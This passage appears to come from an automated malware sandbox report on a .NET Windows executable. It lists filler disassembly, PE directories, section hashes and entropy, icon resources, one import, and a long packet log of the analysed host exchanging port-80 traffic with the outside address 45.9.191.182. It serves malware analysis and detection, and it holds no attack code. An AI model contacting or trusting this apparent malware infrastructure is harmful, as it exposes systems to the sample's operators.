add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2c88	0x4a	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4000	0x2b49a	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x2c800	0x1248	.rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x30000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xcd8	0xe00	1bc7e5473c4628d9a2cee1f08f60dbb0	False	0.5385044642857143	COM executable for DOS	5.122725434289324	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x4000	0x2b49a	0x2b600	a5cc9fce8bc63407d206f3a4fcb03e97	False	0.18018844560518732	data	3.97458130505116	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x30000	0xc	0x200	e92168d877293da42a39d4ea254701ed	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x40ac	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 11811 x 11811 px/m	0.38475177304964536
RT_ICON	0x4538	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 11811 x 11811 px/m	0.2860655737704918
RT_ICON	0x4ee4	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 11811 x 11811 px/m	0.2225609756097561
RT_ICON	0x5fb0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 11811 x 11811 px/m	0.16307053941908714
RT_ICON	0x857c	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 11811 x 11811 px/m	0.13391591875295228
RT_ICON	0xc7c8	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 20736, resolution 11811 x 11811 px/m	0.1245841035120148
RT_ICON	0x11c74	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 36864, resolution 11811 x 11811 px/m	0.10137691822577255
RT_ICON	0x1b140	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 11811 x 11811 px/m	0.08318052762332899
RT_ICON	0x2b98c	0x33da	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9880216965496459
RT_GROUP_ICON	0x2eda2	0x84	data	0.7348484848484849
RT_VERSION	0x2ee62	0x412	data	0.3771593090211132
RT_MANIFEST	0x2f2b0	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 10, 2024 13:11:52.896819115 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:53.016349077 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:53.018774033 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:53.044655085 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:53.164588928 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.257093906 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.257561922 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.257611036 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.257678032 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.257689953 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.257729053 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.257759094 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.257786989 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.257805109 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.257817030 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.257843971 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.257873058 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.258115053 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.258168936 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.258229017 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.376890898 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.377163887 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.377242088 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.449615955 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.449626923 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.449677944 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.452177048 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.452228069 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.452276945 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.460592985 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.460611105 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.460669994 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.469060898 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.469074011 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.469129086 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.478513002 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.478526115 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.478590965 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.486602068 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.486613989 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.486937046 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.494880915 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.495146990 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.495189905 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.503510952 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.503523111 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.503570080 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.511854887 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.512006998 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.512049913 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.519604921 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.519617081 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.519661903 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.527916908 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.527929068 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.528057098 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.569065094 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.621980906 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.653951883 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.654109001 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.654158115 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.656090975 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.656235933 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.656280994 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.661067963 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.661079884 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.661148071 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.666117907 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.666129112 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.666177034 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.670387030 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.670399904 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.670456886 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.674654007 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.674665928 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.674719095 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.680279016 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.680433989 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.680480003 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.685082912 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.686057091 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.686105013 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.689882994 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.690038919 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.690088034 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.693962097 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.693986893 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.694029093 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.698870897 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.699120998 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.699166059 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.703752041 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.703794956 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.703841925 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.711355925 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.711369038 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.711409092 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.716845036 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.716856956 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.716912985 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.721139908 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.721371889 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.721431017 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.727091074 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.727166891 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.727222919 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.731976032 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.732039928 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.732086897 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.736104012 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.736115932 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.736155987 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.844213963 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.844237089 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.844310999 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.846441031 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.846551895 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.846601009 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.850872993 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.850971937 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.851027966 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.855684996 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.855776072 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.855832100 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.859657049 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.860173941 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.860220909 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.863858938 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.863949060 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.863996983 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.867851019 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.868663073 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.868717909 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.871874094 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.871886969 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.871954918 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.875727892 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.875754118 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.875825882 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.879736900 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.879792929 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.879833937 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.883558035 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.883806944 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.883852959 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.887653112 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.887866020 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.887928963 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.891515970 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.891593933 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.891639948 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.895450115 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.895513058 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.895564079 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.899604082 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.899853945 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.899899960 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.903306007 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.903337002 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.903384924 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.907263994 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.907423019 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.907469034 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.911175013 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.911205053 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.911267996 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.915106058 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.915380001 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.915472984 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.919250965 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.919379950 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.919435024 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.923012018 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.923800945 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.923865080 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.926981926 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.927026033 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.927074909 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.931026936 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.931205988 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.931261063 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.935375929 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.935769081 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.935816050 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.939178944 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.940373898 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.940421104 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.942677975 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.942698956 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.942735910 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.946644068 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.947159052 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.947208881 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.950754881 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.950773001 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.950820923 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.954515934 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.954823017 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.954879999 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:54.958698034 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.958724022 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:54.958775997 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.036815882 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.036900997 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.036998987 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.038507938 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.038613081 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.038667917 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.042639017 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.042752981 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.042805910 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.045442104 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.045536041 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.045595884 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.048697948 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.048717976 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.048768044 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.052057028 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.052216053 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.052277088 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.055116892 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.055459023 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.055519104 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.058360100 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.058371067 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.058427095 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.061280966 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.061398029 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.061449051 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.064244032 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.064820051 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.064874887 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.067190886 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.067203045 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.067246914 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.070100069 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.070235014 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.070290089 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.073020935 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.073095083 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.073143005 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.075910091 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.076179981 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.076234102 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.078521013 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.079579115 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.079629898 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.081204891 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.081279039 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.081325054 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.083909988 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.084017992 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.084074020 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.086682081 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.087167978 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.087227106 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.089230061 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.089242935 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.089287043 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.091849089 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.091955900 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.092005968 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.094641924 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.095123053 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.095202923 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.097326994 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.097338915 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.097387075 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.099991083 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.100003004 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.100055933 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.102566004 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.102598906 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.102646112 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.105114937 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.105158091 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.105202913 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.107781887 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.107810974 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.107865095 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.110361099 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.110480070 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.110538960 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.113096952 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.113111019 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.113179922 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.115721941 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.115736008 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.115784883 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.118349075 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.118360996 CET	80	49706	45.9.191.182	192.168.2.5
